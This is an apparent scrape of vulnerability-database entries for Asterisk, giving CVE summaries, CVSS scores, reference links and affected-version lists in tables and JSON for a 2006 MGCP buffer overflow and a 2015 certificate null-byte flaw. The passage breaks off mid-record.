          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-11-16T07:42:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/20577"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/17459"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19872"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1015164"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.assurance.com.au/advisories/200511-asterisk.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2006/dsa-1048"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/415990/30/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/15336"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2005/2346"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/23002"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/20577"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/17459"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19872"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1015164"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.assurance.com.au/advisories/200511-asterisk.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2006/dsa-1048"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/415990/30/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/15336"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2005/2346"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/23002"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2006-08-24 20:04

Modified

2024-11-21 00:15

Severity ?

Summary

Stack-based buffer overflow in channels/chan_mgcp.c in MGCP in Asterisk 1.0 through 1.2.10 allows remote attackers to execute arbitrary code via a crafted audit endpoint (AUEP) response.

References

URL	Tags
cve@mitre.org	http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11
cve@mitre.org	http://labs.musecurity.com/advisories/MU-200608-01.txt	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/21600	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/22651
cve@mitre.org	http://securitytracker.com/id?1016742	Patch
cve@mitre.org	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
cve@mitre.org	http://www.securityfocus.com/archive/1/444322/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/19683	Patch
cve@mitre.org	http://www.sineapps.com/news.php?rssid=1448
cve@mitre.org	http://www.vupen.com/english/advisories/2006/3372
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/28542
af854a3a-2127-422b-91ae-364da2661108	http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11
af854a3a-2127-422b-91ae-364da2661108	http://labs.musecurity.com/advisories/MU-200608-01.txt	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/21600	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22651
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1016742	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/444322/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/19683	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.sineapps.com/news.php?rssid=1448
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/3372
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/28542

Impacted products

Vendor	Product	Version
digium	asterisk	1.0.0
digium	asterisk	1.0.1
digium	asterisk	1.0.2
digium	asterisk	1.0.3
digium	asterisk	1.0.4
digium	asterisk	1.0.5
digium	asterisk	1.0.6
digium	asterisk	1.0.7
digium	asterisk	1.0.8
digium	asterisk	1.0.9
digium	asterisk	1.0.10
digium	asterisk	1.0_rc1
digium	asterisk	1.0_rc2
digium	asterisk	1.2.0_beta1
digium	asterisk	1.2.0_beta2
digium	asterisk	1.2.6
digium	asterisk	1.2.7
digium	asterisk	1.2.8
digium	asterisk	1.2.9
digium	asterisk	1.2.10

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9A92B4D-16A7-4D99-8F3A-2E5D3B12C86B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "16783925-8EC5-431F-90B5-93B16DCC10B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9C59AF9E-FEC7-44AB-B392-49DB11BAEB0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "325C4452-6541-46F6-A86C-6D6987583FB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5424B5B4-99B3-4695-8E0D-7E8DC8B88C3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "62BDF9F0-1AFD-47E6-9054-A9FC6D422DD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A8D2125-019A-4B73-9E1A-98E745148803",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "46C60C04-EF59-4F5C-96E5-A6E693EA9A06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "3636BB44-DF4D-40AB-8EBB-1EC5D911E4A2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3B3C254-29D9-4911-89A9-AC0CD9EB13F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D8679FD-B2E5-46F6-B20C-F109B9706C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0_rc1:*:*:*:*:*:*:*",
              "matchCriteriaId": "E49F2D76-DC82-4289-8891-4982795D896A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0_rc2:*:*:*:*:*:*:*",
              "matchCriteriaId": "203237E0-BB44-42D0-B65B-CBDAAA68A1BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4042CC21-F3CB-4C77-9E60-AF8AA9A191C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C656168D-7D6A-4E84-9196-A8B170E1F7CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "C619138A-557F-419E-9832-D0FB0E9042C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6656EA0-4D4F-4251-A30F-48375C5CE3E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "4AAD9104-BA4A-478F-9B56-195E0F9A7DF5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F06C361-D7DF-474B-A835-BA8886C11A80",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in channels/chan_mgcp.c in MGCP in Asterisk 1.0 through 1.2.10 allows remote attackers to execute arbitrary code via a crafted audit endpoint (AUEP) response."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer basado en pila en channels/chan_mgcp.c de MGCP en Asterisk 1.0 hasta 1.2.10 permite a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n mediante una respuesta de fin de auditor\u00eda (audit endpoint) (AUEP) manipulada."
    }
  ],
  "id": "CVE-2006-4345",
  "lastModified": "2024-11-21T00:15:44.153",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-08-24T20:04:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/21600"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1016742"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/19683"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.sineapps.com/news.php?rssid=1448"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/3372"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28542"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://ftp.digium.com/pub/asterisk/ChangeLog-1.2.11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/21600"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1016742"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/19683"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.sineapps.com/news.php?rssid=1448"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/3372"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28542"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2015-04-10 15:00

Modified

2024-11-21 02:28

Severity ?

Summary

Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.

References

URL	Tags
cve@mitre.org	http://advisories.mageia.org/MGASA-2015-0153.html
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2015-003.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html
cve@mitre.org	http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html
cve@mitre.org	http://seclists.org/fulldisclosure/2015/Apr/22
cve@mitre.org	http://www.debian.org/security/2016/dsa-3700
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2015:206
cve@mitre.org	http://www.securityfocus.com/archive/1/535222/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/74022
cve@mitre.org	http://www.securitytracker.com/id/1032052
af854a3a-2127-422b-91ae-364da2661108	http://advisories.mageia.org/MGASA-2015-0153.html
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2015-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2015/Apr/22
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2016/dsa-3700
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2015:206
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/535222/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/74022
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1032052

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.1
digium	asterisk	1.8.12.2
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.2
digium	asterisk	1.8.20.2
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.1
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.1
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.1
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.1
digium	asterisk	1.8.28.2
digium	asterisk	1.8.32.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.1
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.15.0
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.1
digium	asterisk	12.3.2
digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0
digium	asterisk	12.6.0
digium	asterisk	12.6.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.1
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.1
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.3.0
digium	asterisk	13.3.1
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	13.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
